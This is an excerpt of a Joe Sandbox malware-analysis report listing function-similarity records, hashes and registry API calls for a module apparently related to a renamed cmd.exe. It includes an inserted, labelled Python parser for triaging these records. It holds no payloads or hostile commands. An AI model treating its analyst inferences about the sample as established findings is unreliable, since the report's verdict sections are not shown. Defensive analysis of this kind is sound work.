• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
• String ID: %9d$%s$~
• API String ID: 3651208239-912394897
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
• String ID: COPYCMD$\
• API String ID: 3989487059-1802776761
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Time$File$System$FormatInfoLocalLocale
• String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
• API String ID: 55602301-2548490036
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
• String ID:
• API String ID: 3935429995-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: _get_osfhandlememset$wcschr
• String ID: DPATH
• API String ID: 3260997497-2010427443
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
• String ID: @P
• API String ID: 1801357106-3670739982
                                                                                          • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                          • Instruction ID: a846b69672dd927ed994c481fdf7dc5f8e903dd6f6ac091100152cf21ecb5548
                                                                                          • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                          • Instruction Fuzzy Hash: 1B414E32B05A42EEE7108F70D4402EDA7B0FB89759F949231DA0D82B88DF78D508D740
                                                                                          APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset$BufferConsoleInfoScreen
• String ID:
• API String ID: 1034426908-0
• Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
• Instruction ID: 2c83b55237c779a99e1d0732320776a39781864c7c35da457077c81467b1ce50
• Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
• Instruction Fuzzy Hash: EFF1BE32B0A783AAEB64CF21D8402E967A4FF45788F444135DA5E8BB96DF3CE544E700
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CloseValue$CreateDeleteOpen
• String ID: %s=%s$\Shell\Open\Command
• API String ID: 4081037667-3301834661
• Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
• Instruction ID: a870c75418c8c78596414206db804b225a0010f17dca43491a0fa0b2b4d66606
• Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
• Instruction Fuzzy Hash: 71710771B0A783A2EB608B25E0502BAE3A1FF897C4F584131DE4E87794DF3CD595A740
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AACF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB39
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB6F
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABA4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABCB
Strings
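The records in this section are Joe Sandbox function-similarity entries for the module loaded at 00007FF6A0E70000 in process 4: per function, the API/String IDs, the Opcode and Instruction fuzzy hashes, and (where expanded) the resolved API calls with their reference addresses. The record just above, a function that calls RegCreateKeyExW, RegSetValueExW, RegDeleteKeyExW and RegDeleteValueW next to the string "\Shell\Open\Command", is the kind of entry an analyst wants to pull out of a long report and pivot on. The following is an added example, not Joe Sandbox's code and not part of this report: a parser for these records with a registry-write filter and a fuzzy-hash index. SAMPLE is a verbatim copy of two records from this section (constructed input, bullets included); the REGISTRY_WRITES watch list is an assumption chosen for the example.

```python
"""Parse Joe Sandbox function-similarity records (Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity / APIs / Strings blocks) into dicts.
Added example, not Joe Sandbox code. SAMPLE is copied from the report;
REGISTRY_WRITES is an assumed watch list for the triage filter."""
import re
from collections import defaultdict

# Constructed input: two records copied verbatim from the report section.
SAMPLE = r"""
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CloseValue$CreateDeleteOpen
• String ID: %s=%s$\Shell\Open\Command
• API String ID: 4081037667-3301834661
• Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
• Instruction ID: a870c75418c8c78596414206db804b225a0010f17dca43491a0fa0b2b4d66606
• Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
• Instruction Fuzzy Hash: 71710771B0A783A2EB608B25E0502BAE3A1FF897C4F584131DE4E87794DF3CD595A740
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AACF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB39
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: _wcsnicmpwcsrchr
• String ID: COPYCMD
• API String ID: 2429825313-3727491224
• Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
• Instruction ID: e6fd5db5d526517d8963abec1a7839d78c00a167086207b3b93dd10836f17a37
• Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
• Instruction Fuzzy Hash: C4F1BD32F0A753AAFB608FA490402BD72A1BB44B98F504275DE5EA37D5EF3CA455E340
APIs
"""

SECTIONS = ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "APIs", "Strings")
# Matches "Name.Module(args), ref: addr" as well as "Name.Module ref: addr".
API_CALL = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.\-]+)(?P<args>\(.*\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
# Assumption: which registry APIs count as a "write" for triage purposes.
REGISTRY_WRITES = {"RegCreateKeyExW", "RegSetValueExW", "RegDeleteKeyExW", "RegDeleteValueW"}


def parse_records(text):
    """Split report text into one dict per function record."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "Memory Dump Source":  # every record opens with this block
                cur = {"dump": {}, "fields": {}, "apis": [], "strings": []}
                records.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section in ("Memory Dump Source", "Joe Sandbox IDA Plugin"):
            key, _, val = body.partition(":")
            cur["dump"].setdefault(key.strip(), []).append(val.strip())
        elif section == "Similarity":
            key, _, val = body.partition(":")
            cur["fields"][key.strip()] = val.strip()
        elif section == "APIs":
            m = API_CALL.match(body)
            if m:
                cur["apis"].append({"name": m["name"], "module": m["module"], "ref": m["ref"]})
        elif section == "Strings":
            cur["strings"].append(body)
    return records


def functions_writing_registry(records):
    """Opcode IDs of records whose resolved APIs include a registry write or delete."""
    return [r["fields"]["Opcode ID"] for r in records
            if REGISTRY_WRITES & {a["name"] for a in r["apis"]}]


def index_by(records, field="Instruction Fuzzy Hash"):
    """Group records by a Similarity field, e.g. to match functions across samples."""
    idx = defaultdict(list)
    for r in records:
        if r["fields"].get(field):
            idx[r["fields"][field]].append(r)
    return dict(idx)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["fields"]["Opcode ID"][:16], r["fields"]["API ID"], [a["name"] for a in r["apis"]])
    print("registry writers:", functions_writing_registry(recs))
```

The parser is deliberately line-oriented, because the report renders one bullet per field and a bare heading per section, so it copes with the collapsed (empty) APIs and Strings sections that most records in this section have. One caveat before treating the registry-writing function as attacker code: DPATH and COPYCMD, which appear as String IDs in neighbouring records of the same module, are environment variables read by cmd.exe's built-in commands, and "%s=%s" next to "\Shell\Open\Command" is consistent with the interpreter's own ftype/assoc handling. Since this report flags cmd.exe being copied under a different name, compare the Instruction Fuzzy Hash of that function against a clean cmd.exe of the same build before attributing it to the payload rather than to the interpreter.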
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
• Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
• Instruction ID: 160f205e95fdf698a8f2a8e1524f4e0e357153422cbb8617eea0da59251cdc91
• Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
• Instruction Fuzzy Hash: AE51D332B0A783A6E7608B25E4407BABAE1FF89780F548234DE4DC3795EF38D4559B00
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: _wcsnicmpwcsrchr
• String ID: COPYCMD
• API String ID: 2429825313-3727491224
• Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
• Instruction ID: e6fd5db5d526517d8963abec1a7839d78c00a167086207b3b93dd10836f17a37
• Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
• Instruction Fuzzy Hash: C4F1BD32F0A753AAFB608FA490402BD72A1BB44B98F504275DE5EA37D5EF3CA455E340
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset$FullNamePathwcsrchr
• String ID:
• API String ID: 4289998964-0
• Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
• Instruction ID: 31996360922461fed1ffc5e96bf9fd73a9729b9739caa87b56dc7ec1a9c6bab7
• Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
• Instruction Fuzzy Hash: 7BC1B171B0B35BA2EE949B529548779A3A0FB45BD0F005539CE0E87BD1EF3CE891A340
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
• String ID:
• API String ID: 3476366620-0
• Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
• Instruction ID: 78da4045e0ed39af1115b8b3cef29eb6c444dbc9e20ddcfa0e53204b8fcf4155
• Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
• Instruction Fuzzy Hash: 1F212430D1BA43B6FA546B20E9153B8AB61FF8AB56F944635D55EC23E1DF3CA408E300
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction ID: da337f146694d40f7d7b5ee8f168c45d44a5ef4284a76db0b27135cd516d3f6c
• Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction Fuzzy Hash: F1115132A06B429BEB00DF70E8441A933B4FB5D759F500A30EA6D87B54EF7CD5A49340
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
• String ID: %9d
• API String ID: 1006866328-2241623522
• Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
• Instruction ID: 584314e8e6697c1001848f46849e834c573d0aa5fcb5bb617292585b91cd71d2
• Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
• Instruction Fuzzy Hash: 06516272A0A743AAE740CF21E8406A97BB4FB45794F408635DA2DD37A6DF3CE544EB40
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: the same six dumps listed under the first Memory Dump Source block above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
• Instruction ID: 5d99bb03fa24f23f1c3eb004f67337d4875a5d925f797104a76df9fe28371f9c
• Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
• Instruction Fuzzy Hash: 34C1F132F0A787A6EB64CB20E990AB963A4FF95784F044135DA1D877A2DF3CE555A300
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                          • Instruction ID: e97064ca92a99d9d25d82d0f8144d668bb9ce0c0e071ad0bd3cf7dfa0534990e
                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                          • Instruction Fuzzy Hash: 49A1C032A0A743A6EB64DB25A45167A62E5FF89B80F548135DE4EC7792DF3CE801E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DiskFreeSpace
                                                                                          • String ID: %5lu
                                                                                          • API String ID: 2448137811-2100233843
                                                                                          • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                          • Instruction ID: 9efe89c224dbc9926b1a53b6ad6aba268187bec6cd7f6af01ec8e3a2e3b40a2a
                                                                                          • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                          • Instruction Fuzzy Hash: 1841A47270AAC6A5EB61DF21E8406EAB361FB84785F448035EE4D4B749DF7CD149D700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp
                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                          • API String ID: 2081463915-1994581435
                                                                                          • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                          • Instruction ID: b2723ad11d3a3c08bbdef750993e4688520610bdf7ee7dd5c0fc65c4f49a2f5b
                                                                                          • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                          • Instruction Fuzzy Hash: 6071CB31E0F683B5FBA4AB24A85427426E0BF59784F144939D91EC27E2DF3CB481A340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1497570035-0
                                                                                          • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                          • Instruction ID: dc66613b06964d00034f332daa1846915d0c7ba71147e6895922e5b09744fd62
                                                                                          • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                          • Instruction Fuzzy Hash: BDC13732E0F683A2EA54DB15A5502B967A0FF95780F044136EA5EC77D6EF3CE404E700
                                                                                          APIs
                                                                                          Memory Dump Source
